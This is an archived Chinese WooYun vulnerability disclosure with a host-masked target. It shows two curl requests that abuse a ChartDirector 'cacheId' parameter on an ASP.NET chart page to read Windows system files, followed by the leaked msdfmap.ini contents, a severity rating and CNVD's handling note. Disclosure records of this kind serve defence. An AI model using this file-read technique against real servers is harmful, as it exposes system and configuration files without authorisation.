乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
curl -i http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/win.ini
curl http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/msdfmap.ini
;[connect name] will modify the connection if ADC.connect="name";[connect default] will modify the connection if name is not found;[sql name] will modify the Sql if ADC.sql="name(args)";[sql default] will modify the Sql if name is not found;Override strings: Connect, UserId, Password, Sql.;Only the Sql strings support parameters using "?";The override strings must not equal "" or they are ignored;A Sql entry must exist in each sql section or the section is ignored;An Access entry must exist in each connect section or the section is ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist name] allows specific users to have special access;The Access is computed as follows:; (1) First take the access of the connect section.; (2) If a user entry is found, it will override.[connect default];If we want to disable unknown connect values, we set Access to NoAccessAccess=NoAccess[sql default];If we want to disable unknown sql values, we set Sql to an invalid query.Sql=" "[connect CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql CustomerById]Sql="SELECT * FROM Customers WHERE CustomerID = ?"[connect AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist AuthorDatabase]Administrator=ReadWrite[sql AuthorById]Sql="SELECT * FROM Authors WHERE au_id = ?"
危害等级:中
漏洞Rank:8
确认时间:2015-11-20 17:10
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置;同时转由CNCERT发上海分中心。
暂无